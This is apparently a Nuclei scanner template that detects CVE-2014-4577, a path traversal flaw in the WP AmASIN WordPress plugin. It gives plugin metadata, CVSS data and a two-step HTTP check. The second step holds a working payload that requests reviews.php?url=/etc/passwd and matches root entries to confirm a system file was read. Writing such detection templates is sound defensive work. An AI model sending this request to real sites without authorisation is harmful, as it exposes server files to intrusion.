id: CVE-2014-4577 info: name: WP AmASIN – The Amazon Affiliate Shop - Local File Inclusion author: DhiyaneshDK severity: medium description: | Absolute path traversal vulnerability in reviews.php in the WP AmASIN - The Amazon Affiliate Shop plugin 0.9.6 and earlier for WordPress allows remote attackers to read arbitrary files via a full pathname in the url parameter. reference: - https://codevigilant.com/disclosure/wp-plugin-wp-amasin-the-amazon-affiliate-shop-local-file-inclusion/ - https://wpscan.com/plugin/wp-amasin-the-amazon-affiliate-shop/ - https://github.com/superlink996/chunqiuyunjingbachang classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2014-4577 cwe-id: CWE-22 epss-score: 0.00847 epss-percentile: 0.82512 cpe: cpe:2.3:a:websupporter:wp_amasin_-_the_amazon_affiliate_shop:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: websupporter product: wp_amasin_-_the_amazon_affiliate_shop framework: wordpress publicwww-query: "/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/" tags: cve,cve2014,wordpress,wpscan,wp-plugin,lfi,wp,wp-amasin-the-amazon-affiliate-shop flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/")' - 'status_code == 200' condition: and internal: true - raw: - | GET /wp-content/plugins/wp-amasin-the-amazon-affiliate-shop/reviews.php?url=/etc/passwd HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a0047304502200953c9a52adc445e3fb41704563b1179e522ac19fde2c181baa92b3a9cb00195022100a06a6b65b2eb5475d98ed66ab7ad066e35e89f9d7f7d479ec32a5a5827380ce0:922c64590222798bb761d5b6d8e72950